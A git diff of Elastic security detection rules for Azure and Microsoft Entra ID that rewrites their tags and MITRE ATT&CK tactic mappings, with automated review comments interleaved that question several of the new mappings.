--- a/rules/integrations/azure/persistence_entra_id_global_administrator_role_assigned.toml
+++ b/rules/integrations/azure/persistence_entra_id_global_administrator_role_assigned.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/01/06"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/10"
 [rule]
 author = ["Elastic"]
@@ -60,7 +60,16 @@ references = [
 risk_score = 73
 rule_id = "04c5a96f-19c5-44fd-9571-a0b033f9086f"
 severity = "high"
-tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Domain: Identity",
+ "Data Source: Azure",
+ "Data Source: Microsoft Entra ID",
+ "Data Source: Microsoft Entra ID Audit Logs",
+ "Use Case: Identity and Access Audit",
+ "Tactic: Persistence",
+ "Resources: Investigation Guide"
+]
 timestamp_override = "event.ingested"
 type = "query"
@@ -74,36 +83,19 @@ event.dataset:azure.auditlogs and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1098.003"
 name = "Additional Cloud Roles"
 reference = "https://attack.mitre.org/techniques/T1098/003/"
+
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1098.003"
-name = "Additional Cloud Roles"
-reference = "https://attack.mitre.org/techniques/T1098/003/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml b/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml
index 38ea5fab7ad..5729fb8abc7 100644
--- a/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml
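Review bot: The new side keeps only the Persistence entry for `T1098.003` Additional Cloud Roles and removes the `TA0004` Privilege Escalation entry together with the `Tactic: Privilege Escalation` tag, yet assigning the Global Administrator role is arguably the primary privilege-escalation event in Entra ID, and ATT&CK lists T1098 under both Persistence and Privilege Escalation. Dropping the tactic also removes this rule from Privilege Escalation coverage views, so if a single primary tactic per rule is the intent it should be stated in the PR description. The same Privilege Escalation removal is made in persistence_entra_id_pim_user_added_global_admin.toml, persistence_entra_id_service_principal_credentials_added.toml, persistence_entra_id_user_added_as_owner_for_azure_application.toml, persistence_entra_id_user_added_as_owner_for_azure_service_principal.toml and persistence_event_hub_created_or_updated.toml. As a style point, the two added blank lines before `[rule.threat.tactic]` leave a double blank where the file otherwise uses one; this recurs in several of the hunks below.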
+++ b/rules/integrations/azure/persistence_entra_id_mfa_disabled_for_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/20"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/09/08"
 [rule]
 author = ["Elastic"]
@@ -62,7 +62,16 @@ This rule identifies the deactivation of MFA for an Entra ID user account. This
 risk_score = 47
 rule_id = "dafa3235-76dc-40e2-9f71-1773b96d24cf"
 severity = "medium"
-tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Domain: Identity",
+ "Data Source: Azure",
+ "Data Source: Microsoft Entra ID",
+ "Data Source: Microsoft Entra ID Audit Logs",
+ "Use Case: Identity and Access Audit",
+ "Resources: Investigation Guide",
+ "Tactic: Persistence",
+]
 timestamp_override = "event.ingested"
 type = "query"
@@ -77,36 +86,19 @@ event.dataset: "azure.auditlogs" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1556"
 name = "Modify Authentication Process"
 reference = "https://attack.mitre.org/techniques/T1556/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1556.006"
 name = "Multi-Factor Authentication"
 reference = "https://attack.mitre.org/techniques/T1556/006/"
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1556"
-name = "Modify Authentication Process"
-reference = "https://attack.mitre.org/techniques/T1556/"
-[[rule.threat.technique.subtechnique]]
-id = "T1556.006"
-name = "Multi-Factor Authentication"
-reference = "https://attack.mitre.org/techniques/T1556/006/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
diff --git a/rules/integrations/azure/persistence_entra_id_pim_user_added_global_admin.toml b/rules/integrations/azure/persistence_entra_id_pim_user_added_global_admin.toml
index 4cd9743fae9..67622baed76 100644
--- a/rules/integrations/azure/persistence_entra_id_pim_user_added_global_admin.toml
+++ b/rules/integrations/azure/persistence_entra_id_pim_user_added_global_admin.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/09/24"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/10"
 [rule]
 author = ["Elastic"]
@@ -69,7 +69,7 @@ references = [
 risk_score = 73
 rule_id = "ed9ecd27-e3e6-4fd9-8586-7754803f7fc8"
 severity = "high"
-tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
+tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Identity and Access Audit", "Tactic: Persistence", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -84,36 +84,18 @@ event.dataset:azure.auditlogs and azure.auditlogs.properties.category:RoleManage
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1098.003"
 name = "Additional Cloud Roles"
 reference = "https://attack.mitre.org/techniques/T1098/003/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1098.003"
-name = "Additional Cloud Roles"
-reference = "https://attack.mitre.org/techniques/T1098/003/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml b/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml
index 68e733f883d..421b38cec2b 100644
--- a/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml
+++ b/rules/integrations/azure/persistence_entra_id_privileged_identity_management_role_modified.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/09/01"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/10"
 [rule]
 author = ["Elastic"]
@@ -68,7 +68,13 @@ references = [
 risk_score = 47
 rule_id = "7882cebf-6cf1-4de3-9662-213aa13e8b80"
 severity = "medium"
-tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Azure", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Data Source: Azure",
+ "Use Case: Identity and Access Audit",
+ "Resources: Investigation Guide",
+ "Tactic: Persistence",
+]
 timestamp_override = "event.ingested"
 type = "query"
@@ -79,26 +85,30 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Update role se
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1484"
-name = "Domain or Tenant Policy Modification"
-reference = "https://attack.mitre.org/techniques/T1484/"
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+[[rule.threat.technique.subtechnique]]
+id = "T1098.003"
+name = "Additional Cloud Roles"
+reference = "https://attack.mitre.org/techniques/T1098/003/"
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1484"
-name = "Domain or Tenant Policy Modification"
-reference = "https://attack.mitre.org/techniques/T1484/"
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
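Review bot: The second `[[rule.threat]]` on the new side maps `T1078` Valid Accounts under `TA0005` Defense Evasion, while the rewritten `tags` keep only `Tactic: Persistence`, so the Defense Evasion tactic has no tag. The query matches a PIM role-setting update (`Update role se…` in the hunk header), which is a change to a role definition rather than a use of a valid account, so `T1078` is a loose fit. If one tactic per rule is the aim, drop the second entry; if Defense Evasion should stay, `T1484` Domain or Tenant Policy Modification, which the old side used, is the closer technique and `Tactic: Defense Evasion` should be re-added.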
diff --git a/rules/integrations/azure/persistence_entra_id_rt_to_prt_transition_from_user_device.toml b/rules/integrations/azure/persistence_entra_id_rt_to_prt_transition_from_user_device.toml
index 72b956b54e5..b1eac4dbf32 100644
--- a/rules/integrations/azure/persistence_entra_id_rt_to_prt_transition_from_user_device.toml
+++ b/rules/integrations/azure/persistence_entra_id_rt_to_prt_transition_from_user_device.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/06/24"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/15"
 [rule]
 author = ["Elastic"]
@@ -52,7 +52,17 @@ references = [
 risk_score = 47
 rule_id = "40e60816-5122-11f0-9caa-f661ea17fbcd"
 severity = "medium"
-tags = ["Domain: Cloud", "Domain: Identity", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Sign-In Logs", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Domain: Identity",
+ "Use Case: Threat Detection",
+ "Data Source: Azure",
+ "Data Source: Microsoft Entra ID",
+ "Data Source: Microsoft Entra ID Sign-In Logs",
+ "Tactic: Persistence",
+ "Tactic: Initial Access",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -100,28 +110,48 @@ field_names = [
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1078.004"
 name = "Cloud Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/004/"
+
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1098.005"
 name = "Device Registration"
 reference = "https://attack.mitre.org/techniques/T1098/005/"
+
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1528"
+name = "Steal Application Access Token"
+reference = "https://attack.mitre.org/techniques/T1528/"
+
+
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
+
diff --git a/rules/integrations/azure/persistence_entra_id_service_principal_credentials_added.toml b/rules/integrations/azure/persistence_entra_id_service_principal_credentials_added.toml
index 99fc3c11e04..39ea903de00 100644
--- a/rules/integrations/azure/persistence_entra_id_service_principal_credentials_added.toml
+++ b/rules/integrations/azure/persistence_entra_id_service_principal_credentials_added.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/05/05"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/10"
 [rule]
 author = ["Elastic", "Austin Songer"]
@@ -60,7 +60,15 @@ references = [
 risk_score = 47
 rule_id = "f766ffaf-9568-4909-b734-75d19b35cbf4"
 severity = "medium"
-tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Data Source: Azure",
+ "Data Source: Microsoft Entra ID",
+ "Data Source: Microsoft Entra ID Audit Logs",
+ "Use Case: Identity and Access Audit",
+ "Tactic: Persistence",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -73,7 +81,6 @@ event.dataset: "azure.auditlogs"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
@@ -84,28 +91,13 @@ id = "T1098.001"
 name = "Additional Cloud Credentials"
 reference = "https://attack.mitre.org/techniques/T1098/001/"
+
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1098.001"
-name = "Additional Cloud Credentials"
-reference = "https://attack.mitre.org/techniques/T1098/001/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = [
diff --git a/rules/integrations/azure/persistence_entra_id_service_principal_federated_issuer_modified.toml b/rules/integrations/azure/persistence_entra_id_service_principal_federated_issuer_modified.toml
index aa8729363c5..fd409ec66bb 100644
--- a/rules/integrations/azure/persistence_entra_id_service_principal_federated_issuer_modified.toml
+++ b/rules/integrations/azure/persistence_entra_id_service_principal_federated_issuer_modified.toml
@@ -4,7 +4,7 @@ integration = ["azure"]
 maturity = "production"
 min_stack_version = "9.2.0"
 min_stack_comments = "Changes in ECS added cloud.* fields which are not available prior to ^9.2.0"
-updated_date = "2026/03/23"
+updated_date = "2026/03/18"
 [rule]
 author = ["Elastic"]
@@ -61,7 +61,17 @@ setup = """### Microsft Entra ID Audit Logs
 This rule requires the Azure integration with Microsoft Entra ID Audit Logs data stream ingesting in your Elastic Stack deployment. For more information, refer to the [Microsoft Entra ID Audit Logs integration documentation](https://www.elastic.co/docs/reference/integrations/azure/adlogs).
 """
 severity = "high"
-tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Domain: Identity",
+ "Data Source: Azure",
+ "Data Source: Microsoft Entra ID",
+ "Data Source: Microsoft Entra ID Audit Logs",
+ "Use Case: Identity and Access Audit",
+ "Tactic: Persistence",
+ "Tactic: Privilege Escalation",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -81,18 +91,36 @@ from logs-azure.auditlogs-* metadata _id, _version, _index
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1098.001"
 name = "Additional Cloud Credentials"
 reference = "https://attack.mitre.org/techniques/T1098/001/"
+
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1484"
+name = "Domain or Tenant Policy Modification"
+reference = "https://attack.mitre.org/techniques/T1484/"
+[[rule.threat.technique.subtechnique]]
+id = "T1484.002"
+name = "Trust Modification"
+reference = "https://attack.mitre.org/techniques/T1484/002/"
+
+
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
+
diff --git a/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml b/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml
index d988f949290..2ca71e31d2f 100644
--- a/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml
+++ b/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/03/03"
 integration = ["azure"]
 maturity = "development"
-updated_date = "2026/03/23"
+updated_date = "2026/03/03"
 [rule]
 author = ["Elastic"]
@@ -71,7 +71,17 @@ setup = """### Microsoft Entra ID Audit Logs
 This rule requires the Azure integration with Microsoft Entra ID Audit Logs data stream ingesting in your Elastic Stack deployment. For more information, refer to the [Microsoft Entra ID Audit Logs integration documentation](https://www.elastic.co/docs/reference/integrations/azure/adlogs).
 """
 severity = "high"
-tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Domain: Identity",
+ "Data Source: Azure",
+ "Data Source: Microsoft Entra ID",
+ "Data Source: Microsoft Entra ID Audit Logs",
+ "Use Case: Identity and Access Audit",
+ "Tactic: Persistence",
+ "Tactic: Privilege Escalation",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "query"
@@ -85,44 +95,33 @@ event.dataset: azure.auditlogs
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1484"
 name = "Domain or Tenant Policy Modification"
 reference = "https://attack.mitre.org/techniques/T1484/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1484.002"
 name = "Trust Modification"
 reference = "https://attack.mitre.org/techniques/T1484/002/"
-[[rule.threat.technique]]
-id = "T1556"
-name = "Modify Authentication Process"
-reference = "https://attack.mitre.org/techniques/T1556/"
-[[rule.threat.technique.subtechnique]]
-id = "T1556.007"
-name = "Hybrid Identity"
-reference = "https://attack.mitre.org/techniques/T1556/007/"
 [rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1556"
-name = "Modify Authentication Process"
-reference = "https://attack.mitre.org/techniques/T1556/"
-
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
 [[rule.threat.technique.subtechnique]]
-id = "T1556.007"
-name = "Hybrid Identity"
-reference = "https://attack.mitre.org/techniques/T1556/007/"
+id = "T1098.001"
+name = "Additional Cloud Credentials"
+reference = "https://attack.mitre.org/techniques/T1098/001/"
+
+
 [rule.threat.tactic]
 id = "TA0003"
diff --git a/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_application.toml b/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_application.toml
index b0cd7cfb345..0491e8e6a55 100644
--- a/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_application.toml
+++ b/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_application.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/20"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/10"
 [rule]
 author = ["Elastic"]
@@ -57,7 +57,7 @@ The Azure Fleet integration, Filebeat module, or similarly structured data is re
 risk_score = 21
 rule_id = "774f5e28-7b75-4a58-b94e-41bf060fdd86"
 severity = "low"
-tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Use Case: Configuration Audit", "Resources: Investigation Guide"]
+tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Configuration Audit", "Tactic: Persistence", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -68,26 +68,26 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Add owner to a
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
+id = "T1528"
+name = "Steal Application Access Token"
+reference = "https://attack.mitre.org/techniques/T1528/"
+
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
+
diff --git a/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_service_principal.toml b/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_service_principal.toml
index 38a064cdfed..0d51d53cae8 100644
--- a/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_service_principal.toml
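Review bot: The new Credential Access entry maps `T1528` Steal Application Access Token to a user being added as owner of an application, but the logged operation (`Add owner to a…` in the hunk header) is an ownership change, not token theft, so `T1528` describes a possible later consequence rather than what the query observes. `T1098.003` Additional Cloud Roles, or simply keeping the removed Privilege Escalation entry, describes the event directly. Whichever mapping stays, the `tags` written in the `@@ -57,7` hunk list only `Tactic: Persistence`, so `Tactic: Credential Access` is missing for this second entry.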
+++ b/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_service_principal.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/20"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/10"
 [rule]
 author = ["Elastic"]
@@ -62,7 +62,7 @@ references = [
 risk_score = 21
 rule_id = "38e5acdd-5f20-4d99-8fe4-f0a1a592077f"
 severity = "low"
-tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Azure", "Use Case: Configuration Audit", "Resources: Investigation Guide"]
+tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Configuration Audit", "Tactic: Persistence", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -73,36 +73,23 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Add owner to s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
 [[rule.threat.technique.subtechnique]]
-id = "T1098.003"
-name = "Additional Cloud Roles"
-reference = "https://attack.mitre.org/techniques/T1098/003/"
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1098.003"
-name = "Additional Cloud Roles"
-reference = "https://attack.mitre.org/techniques/T1098/003/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
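Review bot: Replacing `T1098.003` Additional Cloud Roles with `T1078`/`T1078.004` Cloud Accounts changes what this rule claims to observe: adding an owner to a service principal (`Add owner to s…` in the hunk header) is a permission grant, which `T1098.003` names exactly, while `T1078.004` describes use of an existing cloud account. Keeping `T1098.003` under the `T1098` technique table that is still listed, and dropping `T1078` unless the description makes the valid-account angle explicit, would keep the mapping faithful to the query. Note also that the kept `[[rule.threat.technique.subtechnique]]` now follows the `T1078` table, so TOML attaches it to `T1078` rather than to `T1098` above it — correct for `T1078.004`, but easy to misread.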
diff --git a/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml b/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml
index 431d0f19a4c..ab26fc86d1c 100644
--- a/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml
+++ b/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/06/16"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/17"
 [rule]
 author = ["Elastic"]
@@ -58,7 +58,16 @@ setup = """#### Required Microsoft Entra ID Sign-In Logs
 This rule requires the Azure integration with Microsoft Entra ID Sign-In logs to be enabled and configured to collect audit and activity logs via Azure Event Hub.
 """
 severity = "low"
-tags = ["Domain: Cloud", "Domain: Identity", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Sign-in Logs", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Domain: Identity",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Data Source: Azure",
+ "Data Source: Microsoft Entra ID",
+ "Data Source: Microsoft Entra ID Sign-in Logs",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -75,39 +84,39 @@ event.dataset: "azure.signinlogs" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+[[rule.threat.technique.subtechnique]]
+id = "T1098.005"
+name = "Device Registration"
+reference = "https://attack.mitre.org/techniques/T1098/005/"
+
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1078.004"
 name = "Cloud Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/004/"
+
+
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1098.005"
-name = "Device Registration"
-reference = "https://attack.mitre.org/techniques/T1098/005/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
 [rule.investigation_fields]
 field_names = [
 "azure.signinlogs.properties.user_principal_name",
diff --git a/rules/integrations/azure/persistence_event_hub_created_or_updated.toml b/rules/integrations/azure/persistence_event_hub_created_or_updated.toml
index 49921ba6a96..6cf84594742 100644
--- a/rules/integrations/azure/persistence_event_hub_created_or_updated.toml
+++ b/rules/integrations/azure/persistence_event_hub_created_or_updated.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/18"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/10"
 [rule]
 author = ["Elastic"]
